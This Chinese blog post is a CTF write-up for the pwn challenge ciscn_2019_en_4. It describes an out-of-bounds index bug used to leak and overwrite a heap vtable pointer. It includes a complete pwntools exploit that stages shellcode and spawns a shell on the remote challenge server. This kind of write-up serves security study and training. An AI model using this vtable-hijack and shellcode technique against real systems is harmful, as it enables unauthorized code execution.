ciscn_2019_en_4

最新推荐文章于 2023-10-08 16:40:06 发布
最新推荐文章于 2023-10-08 16:40:06 发布
阅读量440 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105865073
版权
pwn 同时被 3 个专栏收录
161 篇文章 25 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏

ciscn_2019_en_4

首先检查一下程序的保护机制

然后,我们用IDA分析一下,主函数里的功能通过对应index的虚表调用,虚表存在在堆里。

Edit功能存在下标溢出,因此可以向上溢出修改虚表指针。

Show功能同理存在溢出,可以读取原来的虚表地址,进而计算出程序的基址。

进而计算出堆指针存放的地址,我们将堆指针的地址-0x18作为虚表地址,这样,当我们再次调用功能1的时候,就会执行heap[0]()。利用8字节shellcode,构造一个read系统调用来输入shellcode主体。

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
#sh = process('./ciscn_2019_en_4')
sh = remote('node3.buuoj.cn',29251)
elf = ELF('./ciscn_2019_en_4')

def add(size):
   sh.sendlineafter('Your choice:','1')
   sh.sendlineafter('Money makes you stronger:',str(size))

def edit(index,content):
   sh.sendlineafter('Your choice:','3')
   sh.sendlineafter('change Weapon id:',str(index))
   sh.sendafter('new Name:',content)

def show(index):
   sh.sendlineafter('Your choice:','4')
   sh.sendlineafter('Which Weapon do you want to show?',str(index))

add(1)
#布置shellcode,最多8字节,我们构造一个read调用来输入主shellcode
shellcode = asm('''cdq
                   xor eax,eax
                   xchg rsi,rdi
                   syscall
                ''')
edit(0,shellcode)

show(-1)
sh.recvuntil('Weapon name is:')
elf_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x203DB8
heap_ptr_addr = elf_base + 0x204088
print 'elf_base=',hex(elf_base)
print 'heap_ptr_addr=',hex(heap_ptr_addr)
#修改虚表
edit(-1,p64(heap_ptr_addr - 0x18))
#触发前面布置的shellcode
sh.sendlineafter('Your choice:','1')
#发送主shellcode
sleep(1)
payload = 'a'*0x14 + asm(shellcraft.sh())
sh.send(payload)

sh.interactive()

 

ha1vk
关注
专栏目录
scada_5.8.3_full_en
08-02
scada_5.8.3_full_en
BUUCTF 刷题 ciscn_2019_en_21
Helloity的博客
02-07 612
ctf刷题
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 7311
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
buuctf|ciscn_2019_en_2 1
m0_64236521的博客
05-02 678
ciscn_2019_en_2 1 下载后我重命名为pwn_14了 checksec一下 nx开启,可以栈溢出 64位,用ida看看 分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt 有gets(s),可以进行栈溢出,没有找到后门函数。 那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。 exp如下 from pwn import* from LibcSearcher import* context(os='linux', ar
buuctf PWN ciscn_2019_c_1
最新发布
wp568的博客
10-08 249
amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)->本函数地址 -> 返回地址。encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。
【BUUCTF-PWNciscn_2019_c_1
qcwwww的博客
05-07 450
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
罗斯蒙特_1199EN
03-18
介绍了关于罗斯蒙特_1199EN的详细说明,提供罗斯蒙特的技术资料的下载。
EN_13757_4__2019_05_13757_EN13757-4_EN13757_源码.zip
09-30
标题中的"EN_13757_4__2019_05_13757_EN13757-4_EN13757_源码.zip"表明这是一个与EN 13757-4标准相关的源码压缩包,发布于2019年5月。EN 13757是一个欧洲标准,主要用于智能热量表(Heat Meters)的通信协议。这个...
e845_Manual_01_2019_EN_manual_
09-30
本手册("e845_Manual_01_2019_EN_manual_")详细介绍了该产品的各项功能、使用方法以及维护技巧,旨在帮助用户充分发挥这款话筒的潜力,提升录音和现场表演的质量。 1. **产品特性** Sennheiser e845 的核心特性...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
CTFciscn_2019_en_2
凉水的博客
01-26 3802
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1244
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
【BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4100
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
ciscn_2019_es_4
doudoudedi
04-08 413
思路 先unlink将地址key写好然后做一次off by one在tcache attack就行了 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_es_4') p=remote('node3.buuoj.cn',25382) elf=ELF('./ciscn_2019_es_4') libc=elf.libc...
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2318
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
ciscn_2019_en_2
m0sway的博客
03-25 1642
ciscn_2019_en_2 WriteUp BUU_PWN
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1345
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
SAP PA LO315_EN_46A_FV过程管理系统培训手册
4. 版权信息:文件中包含了 SAP AG 的版权信息,表明该文件的所有权和著作权都归 SAP AG 所有。 5. 商标信息:文件中列出了多个商标,包括 Microsoft、Lotus、RealNetworks、IDS Prof. Scheer GmbH、Adobe Systems ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值